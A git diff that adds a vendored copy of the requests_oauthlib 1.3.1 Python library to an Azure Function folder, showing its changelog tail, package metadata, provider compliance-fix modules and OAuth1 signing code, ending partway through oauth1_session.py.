OAuth1 RSA-SHA1 signature + method. +- Fixed bug in OAuth2 where supplied state param was not used in auth url. +- OAuth2 HTTPS checking can be disabled by setting environment variable + ``OAUTHLIB_INSECURE_TRANSPORT``. +- OAuth1 now re-authorize upon redirects. +- OAuth1 token fetching now raise a detailed error message when the + response body is incorrectly encoded or the request was denied. +- Added support for custom OAuth1 clients. +- OAuth2 compliance fix for Sina Weibo. +- Multiple fixes to facebook compliance fix. +- Compliance fixes now re-encode body properly as bytes in Python 3. +- Logging now properly done under ``requests_oauthlib`` namespace instead + of piggybacking on oauthlib namespace. +- Logging introduced for OAuth1 auth and session. + +v0.4.0 (29 September 2013) +++++++++++++++++++++++++++ +- OAuth1Session methods only return unicode strings. #55. +- Renamed requests_oauthlib.core to requests_oauthlib.oauth1_auth for consistency. #79. +- Added Facebook compliance fix and access_token_response hook to OAuth2Session. #63. +- Added LinkedIn compliance fix. +- Added refresh_token_response compliance hook, invoked before parsing the refresh token. +- Correctly limit compliance hooks to running only once! +- Content type guessing should only be done when no content type is given +- OAuth1 now updates r.headers instead of replacing it with non case insensitive dict +- Remove last use of Response.content (in OAuth1Session). #44. +- State param can now be supplied in OAuth2Session.authorize_url + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/RECORD new file mode 100644 index 0000000..c1b03fa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/RECORD @@ -0,0 +1,36 @@ +requests_oauthlib-1.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +requests_oauthlib-1.3.1.dist-info/LICENSE,sha256=rgGEavrYqCkf5qCJZvMBWvmo_2ddhLmB-Xk8Ei94dug,745 +requests_oauthlib-1.3.1.dist-info/METADATA,sha256=xlgyoPqiXskknzuvbDx1-CiMjbjCpJ2OkxM_uQgQ6lo,10105 +requests_oauthlib-1.3.1.dist-info/RECORD,, +requests_oauthlib-1.3.1.dist-info/WHEEL,sha256=z9j0xAa_JmUKMpmz72K0ZGALSM_n-wQVmGbleXx2VHg,110 +requests_oauthlib-1.3.1.dist-info/top_level.txt,sha256=vx1R42DWBO64h6iu8Gco0F01TVTPWXSRWBaV1GwVRTQ,18 +requests_oauthlib/__init__.py,sha256=j3FXxxzppgvMvHj2v9csJtfEXt5QWeUODk6TmKTtopE,529 +requests_oauthlib/__pycache__/__init__.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc,, +requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__init__.py,sha256=M0zZXYmddhdiVVtazEC23tmPYP4MDaeBabKh9FiAyGc,398 +requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc,, +requests_oauthlib/compliance_fixes/douban.py,sha256=Ilfc1jTjCD66rPFrPf97g2D8Gb-MjoNuXqSGmaBVAn0,472 +requests_oauthlib/compliance_fixes/ebay.py,sha256=bLaGRBG4Pkoac2V4gme1-3pbRYcxvfAGyPID7K6xIZ8,890 +requests_oauthlib/compliance_fixes/facebook.py,sha256=V6_2BQnyBKcwTWDRqDTbJQcJj4Rd_XMTAlDgGiFTQf4,1119 +requests_oauthlib/compliance_fixes/fitbit.py,sha256=rgA4MrYKHqeNOfCGL0pdG3kgum6rzh1QMvgIHL_EOAE,905 +requests_oauthlib/compliance_fixes/instagram.py,sha256=LO55o9VrmeegJOCzz2-QqMlneXS6YY_33ulA_-cG1pI,948 +requests_oauthlib/compliance_fixes/mailchimp.py,sha256=nTdyttxiTxdAzbC72XZb1_uV4ebVOUvQDpDbAmBTqvQ,757 +requests_oauthlib/compliance_fixes/plentymarkets.py,sha256=HnROrco-Z9EvGEjHw3fn-7UxxC8G2GKB8Yjda3es7Yw,796 +requests_oauthlib/compliance_fixes/slack.py,sha256=YDz9DQ3ukNgbyy1X4JIPAhTKKMwMf8R8THxnzhm79zE,1453 +requests_oauthlib/compliance_fixes/weibo.py,sha256=yMvmc2xGWsaxZZNT3XYdJhDuxXJ99N6rO0n3d2cP9MA,444 +requests_oauthlib/oauth1_auth.py,sha256=yq-3SxMvPa1Ux-dm_a2mC32TDKdGGT2XJJuu3d4QtRo,3737 +requests_oauthlib/oauth1_session.py,sha256=JPThdYoaDbc-I6aH7-UZKvFZ6B1ySvBlUkMqa6TcLpE,17055 +requests_oauthlib/oauth2_auth.py,sha256=uYT7ueHDG9TYR73yIFCX8TbquOz44p21lQYPCVw4gn8,1548 +requests_oauthlib/oauth2_session.py,sha256=lIuu5PbiVYfSrEiJ38H4QWh0maKEqwVUc3sU6hXXXmE,21992 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/WHEEL new file mode 100644 index 0000000..5b8c32a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/WHEEL @@ -0,0 +1,6 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py2-none-any +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/top_level.txt new file mode 100644 index 0000000..f34c632 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib-1.3.1.dist-info/top_level.txt @@ -0,0 +1 @@ +requests_oauthlib diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__init__.py new file mode 100644 index 0000000..7bd5609 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__init__.py @@ -0,0 +1,19 @@ +import logging + +from .oauth1_auth import OAuth1 +from .oauth1_session import OAuth1Session +from .oauth2_auth import OAuth2 +from .oauth2_session import OAuth2Session, TokenUpdated + +__version__ = "1.3.1" + +import requests + +if requests.__version__ < "2.0.0": + msg = ( + "You are using requests version %s, which is older than " + "requests-oauthlib expects, please upgrade to 2.0.0 or later." + ) + raise Warning(msg % requests.__version__) + +logging.getLogger("requests_oauthlib").addHandler(logging.NullHandler()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..48bb44a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc new file mode 100644 index 0000000..fc952a5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc new file mode 100644 index 0000000..7cad404 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth1_session.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc new file mode 100644 index 0000000..c8faaa9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc new file mode 100644 index 0000000..f10c17e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/__pycache__/oauth2_session.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__init__.py new file mode 100644 index 0000000..2d4a5f7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__init__.py @@ -0,0 +1,10 @@ +from __future__ import absolute_import + +from .facebook import facebook_compliance_fix +from .fitbit import fitbit_compliance_fix +from .slack import slack_compliance_fix +from .instagram import instagram_compliance_fix +from .mailchimp import mailchimp_compliance_fix +from .weibo import weibo_compliance_fix +from .plentymarkets import plentymarkets_compliance_fix +from .ebay import ebay_compliance_fix diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..390c554 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc new file mode 100644 index 0000000..5d81ae7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/douban.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc new file mode 100644 index 0000000..e841844 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/ebay.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc new file mode 100644 index 0000000..43bd932 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/facebook.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc new file mode 100644 index 0000000..19de9e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/fitbit.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc new file mode 100644 index 0000000..e4b33d6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/instagram.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc new file mode 100644 index 0000000..15741a2 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/mailchimp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc new file mode 100644 index 0000000..e7e572b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/plentymarkets.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc new file mode 100644 index 0000000..2144ca7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/slack.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc new file mode 100644 index 0000000..f5546ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/__pycache__/weibo.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/douban.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/douban.py new file mode 100644 index 0000000..06b2486 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/douban.py @@ -0,0 +1,17 @@ +import json + +from oauthlib.common import to_unicode + + +def douban_compliance_fix(session): + def fix_token_type(r): + token = json.loads(r.text) + token.setdefault("token_type", "Bearer") + fixed_token = json.dumps(token) + r._content = to_unicode(fixed_token).encode("utf-8") + return r + + session._client_default_token_placement = "query" + session.register_compliance_hook("access_token_response", fix_token_type) + + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/ebay.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/ebay.py new file mode 100644 index 0000000..b440b18 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/ebay.py @@ -0,0 +1,23 @@ +import json +from oauthlib.common import to_unicode + + +def ebay_compliance_fix(session): + def _compliance_fix(response): + token = json.loads(response.text) + + # eBay responds with non-compliant token types. + # https://developer.ebay.com/api-docs/static/oauth-client-credentials-grant.html + # https://developer.ebay.com/api-docs/static/oauth-auth-code-grant-request.html + # Modify these to be "Bearer". + if token.get("token_type") in ["Application Access Token", "User Access Token"]: + token["token_type"] = "Bearer" + fixed_token = json.dumps(token) + response._content = to_unicode(fixed_token).encode("utf-8") + + return response + + session.register_compliance_hook("access_token_response", _compliance_fix) + session.register_compliance_hook("refresh_token_response", _compliance_fix) + + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/facebook.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/facebook.py new file mode 100644 index 0000000..e195c62 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/facebook.py @@ -0,0 +1,33 @@ +from json import dumps + +try: + from urlparse import parse_qsl +except ImportError: + from urllib.parse import parse_qsl + +from oauthlib.common import to_unicode + + +def facebook_compliance_fix(session): + def _compliance_fix(r): + # if Facebook claims to be sending us json, let's trust them. + if "application/json" in r.headers.get("content-type", {}): + return r + + # Facebook returns a content-type of text/plain when sending their + # x-www-form-urlencoded responses, along with a 200. If not, let's + # assume we're getting JSON and bail on the fix. + if "text/plain" in r.headers.get("content-type", {}) and r.status_code == 200: + token = dict(parse_qsl(r.text, keep_blank_values=True)) + else: + return r + + expires = token.get("expires") + if expires is not None: + token["expires_in"] = expires + token["token_type"] = "Bearer" + r._content = to_unicode(dumps(token)).encode("UTF-8") + return r + + session.register_compliance_hook("access_token_response", _compliance_fix) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/fitbit.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/fitbit.py new file mode 100644 index 0000000..e22361b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/fitbit.py @@ -0,0 +1,25 @@ +""" +The Fitbit API breaks from the OAuth2 RFC standard by returning an "errors" +object list, rather than a single "error" string. This puts hooks in place so +that oauthlib can process an error in the results from access token and refresh +token responses. This is necessary to prevent getting the generic red herring +MissingTokenError. +""" + +from json import loads, dumps + +from oauthlib.common import to_unicode + + +def fitbit_compliance_fix(session): + def _missing_error(r): + token = loads(r.text) + if "errors" in token: + # Set the error to the first one we have + token["error"] = token["errors"][0]["errorType"] + r._content = to_unicode(dumps(token)).encode("UTF-8") + return r + + session.register_compliance_hook("access_token_response", _missing_error) + session.register_compliance_hook("refresh_token_response", _missing_error) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/instagram.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/instagram.py new file mode 100644 index 0000000..d973628 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/instagram.py @@ -0,0 +1,26 @@ +try: + from urlparse import urlparse, parse_qs +except ImportError: + from urllib.parse import urlparse, parse_qs + +from oauthlib.common import add_params_to_uri + + +def instagram_compliance_fix(session): + def _non_compliant_param_name(url, headers, data): + # If the user has already specified the token in the URL + # then there's nothing to do. + # If the specified token is different from ``session.access_token``, + # we assume the user intends to override the access token. + url_query = dict(parse_qs(urlparse(url).query)) + token = url_query.get("access_token") + if token: + # Nothing to do, just return. + return url, headers, data + + token = [("access_token", session.access_token)] + url = add_params_to_uri(url, token) + return url, headers, data + + session.register_compliance_hook("protected_request", _non_compliant_param_name) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/mailchimp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/mailchimp.py new file mode 100644 index 0000000..fc3c9f5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/mailchimp.py @@ -0,0 +1,23 @@ +import json + +from oauthlib.common import to_unicode + + +def mailchimp_compliance_fix(session): + def _null_scope(r): + token = json.loads(r.text) + if "scope" in token and token["scope"] is None: + token.pop("scope") + r._content = to_unicode(json.dumps(token)).encode("utf-8") + return r + + def _non_zero_expiration(r): + token = json.loads(r.text) + if "expires_in" in token and token["expires_in"] == 0: + token["expires_in"] = 3600 + r._content = to_unicode(json.dumps(token)).encode("utf-8") + return r + + session.register_compliance_hook("access_token_response", _null_scope) + session.register_compliance_hook("access_token_response", _non_zero_expiration) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/plentymarkets.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/plentymarkets.py new file mode 100644 index 0000000..f759ef4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/plentymarkets.py @@ -0,0 +1,29 @@ +from json import dumps, loads +import re + +from oauthlib.common import to_unicode + + +def plentymarkets_compliance_fix(session): + def _to_snake_case(n): + return re.sub("(.)([A-Z][a-z]+)", r"\1_\2", n).lower() + + def _compliance_fix(r): + # Plenty returns the Token in CamelCase instead of _ + if ( + "application/json" in r.headers.get("content-type", {}) + and r.status_code == 200 + ): + token = loads(r.text) + else: + return r + + fixed_token = {} + for k, v in token.items(): + fixed_token[_to_snake_case(k)] = v + + r._content = to_unicode(dumps(fixed_token)).encode("UTF-8") + return r + + session.register_compliance_hook("access_token_response", _compliance_fix) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/slack.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/slack.py new file mode 100644 index 0000000..13a5d1b --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/slack.py @@ -0,0 +1,37 @@ +try: + from urlparse import urlparse, parse_qs +except ImportError: + from urllib.parse import urlparse, parse_qs + +from oauthlib.common import add_params_to_uri + + +def slack_compliance_fix(session): + def _non_compliant_param_name(url, headers, data): + # If the user has already specified the token, either in the URL + # or in a data dictionary, then there's nothing to do. + # If the specified token is different from ``session.access_token``, + # we assume the user intends to override the access token. + url_query = dict(parse_qs(urlparse(url).query)) + token = url_query.get("token") + if not token and isinstance(data, dict): + token = data.get("token") + + if token: + # Nothing to do, just return. + return url, headers, data + + if not data: + data = {"token": session.access_token} + elif isinstance(data, dict): + data["token"] = session.access_token + else: + # ``data`` is something other than a dict: maybe a stream, + # maybe a file object, maybe something else. We can't easily + # modify it, so we'll set the token by modifying the URL instead. + token = [("token", session.access_token)] + url = add_params_to_uri(url, token) + return url, headers, data + + session.register_compliance_hook("protected_request", _non_compliant_param_name) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/weibo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/weibo.py new file mode 100644 index 0000000..da97b2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/compliance_fixes/weibo.py @@ -0,0 +1,15 @@ +from json import loads, dumps + +from oauthlib.common import to_unicode + + +def weibo_compliance_fix(session): + def _missing_token_type(r): + token = loads(r.text) + token["token_type"] = "Bearer" + r._content = to_unicode(dumps(token)).encode("UTF-8") + return r + + session._client.default_token_placement = "query" + session.register_compliance_hook("access_token_response", _missing_token_type) + return session diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_auth.py new file mode 100644 index 0000000..213f8cd --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_auth.py @@ -0,0 +1,117 @@ +# -*- coding: utf-8 -*- +from __future__ import unicode_literals + +import logging + +from oauthlib.common import extract_params +from oauthlib.oauth1 import Client, SIGNATURE_HMAC, SIGNATURE_TYPE_AUTH_HEADER +from oauthlib.oauth1 import SIGNATURE_TYPE_BODY +from requests.compat import is_py3 +from requests.utils import to_native_string +from requests.auth import AuthBase + +CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded" +CONTENT_TYPE_MULTI_PART = "multipart/form-data" + +if is_py3: + unicode = str + +log = logging.getLogger(__name__) + +# OBS!: Correct signing of requests are conditional on invoking OAuth1 +# as the last step of preparing a request, or at least having the +# content-type set properly. +class OAuth1(AuthBase): + """Signs the request using OAuth 1 (RFC5849)""" + + client_class = Client + + def __init__( + self, + client_key, + client_secret=None, + resource_owner_key=None, + resource_owner_secret=None, + callback_uri=None, + signature_method=SIGNATURE_HMAC, + signature_type=SIGNATURE_TYPE_AUTH_HEADER, + rsa_key=None, + verifier=None, + decoding="utf-8", + client_class=None, + force_include_body=False, + **kwargs + ): + + try: + signature_type = signature_type.upper() + except AttributeError: + pass + + client_class = client_class or self.client_class + + self.force_include_body = force_include_body + + self.client = client_class( + client_key, + client_secret, + resource_owner_key, + resource_owner_secret, + callback_uri, + signature_method, + signature_type, + rsa_key, + verifier, + decoding=decoding, + **kwargs + ) + + def __call__(self, r): + """Add OAuth parameters to the request. + + Parameters may be included from the body if the content-type is + urlencoded, if no content type is set a guess is made. + """ + # Overwriting url is safe here as request will not modify it past + # this point. + log.debug("Signing request %s using client %s", r, self.client) + + content_type = r.headers.get("Content-Type", "") + if ( + not content_type + and extract_params(r.body) + or self.client.signature_type == SIGNATURE_TYPE_BODY + ): + content_type = CONTENT_TYPE_FORM_URLENCODED + if not isinstance(content_type, unicode): + content_type = content_type.decode("utf-8") + + is_form_encoded = CONTENT_TYPE_FORM_URLENCODED in content_type + + log.debug( + "Including body in call to sign: %s", + is_form_encoded or self.force_include_body, + ) + + if is_form_encoded: + r.headers["Content-Type"] = CONTENT_TYPE_FORM_URLENCODED + r.url, headers, r.body = self.client.sign( + unicode(r.url), unicode(r.method), r.body or "", r.headers + ) + elif self.force_include_body: + # To allow custom clients to work on non form encoded bodies. + r.url, headers, r.body = self.client.sign( + unicode(r.url), unicode(r.method), r.body or "", r.headers + ) + else: + # Omit body data in the signing of non form-encoded requests + r.url, headers, _ = self.client.sign( + unicode(r.url), unicode(r.method), None, r.headers + ) + + r.prepare_headers(headers) + r.url = to_native_string(r.url) + log.debug("Updated url: %s", r.url) + log.debug("Updated headers: %s", headers) + log.debug("Updated body: %r", r.body) + return r diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_session.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_session.py new file mode 100644 index 0000000..e2e3e79 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests_oauthlib/oauth1_session.py @@ -0,0 +1,400 @@ +from __future__ import unicode_literals + +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse + +import logging + +from oauthlib.common import add_params_to_uri +from oauthlib.common import urldecode as _urldecode +from oauthlib.oauth1 import SIGNATURE_HMAC, SIGNATURE_RSA, SIGNATURE_TYPE_AUTH_HEADER +import requests + +from . import OAuth1 + + +log = logging.getLogger(__name__) + + +def urldecode(body): + """Parse query or json to python dictionary""" + try: + return _urldecode(body) + except Exception: + import json + + return json.loads(body) + + +class TokenRequestDenied(ValueError): + def __init__(self, message, response): + super(TokenRequestDenied, self).__init__(message) + self.response = response + + @property + def status_code(self): + """For backwards-compatibility purposes""" + return self.response.status_code + + +class TokenMissing(ValueError): + def __init__(self, message, response): + super(TokenMissing, self).__init__(message) + self.response = response + + +class VerifierMissing(ValueError): + pass + + +class OAuth1Session(requests.Session): + """Request signing and convenience methods for the oauth dance. + + What is the difference between OAuth1Session and OAuth1? + + OAuth1Session actually uses OAuth1 internally and its purpose is to assist + in the OAuth workflow through convenience methods to prepare authorization + URLs and parse the various token and redirection responses. It also provide + rudimentary validation of responses. + + An example of the OAuth workflow using a basic CLI app and Twitter. + + >>> # Credentials obtained during the registration. + >>> client_key = 'client key' + >>> client_secret = 'secret' + >>> callback_uri = 'https://127.0.0.1/callback' + >>> + >>> # Endpoints found in the OAuth provider API documentation + >>> request_token_url = 'https://api.twitter.com/oauth/request_token' + >>> authorization_url = 'https://api.twitter.com/oauth/authorize' + >>> access_token_url = 'https://api.twitter.com/oauth/access_token' + >>> + >>> oauth_session = OAuth1Session(client_key,client_secret=client_secret, callback_uri=callback_uri) + >>> + >>> # First step, fetch the request token. + >>> oauth_session.fetch_request_token(request_token_url) + { + 'oauth_token': 'kjerht2309u', + 'oauth_token_secret': 'lsdajfh923874', + } + >>> + >>> # Second step. Follow this link and authorize + >>> oauth_session.authorization_url(authorization_url) + 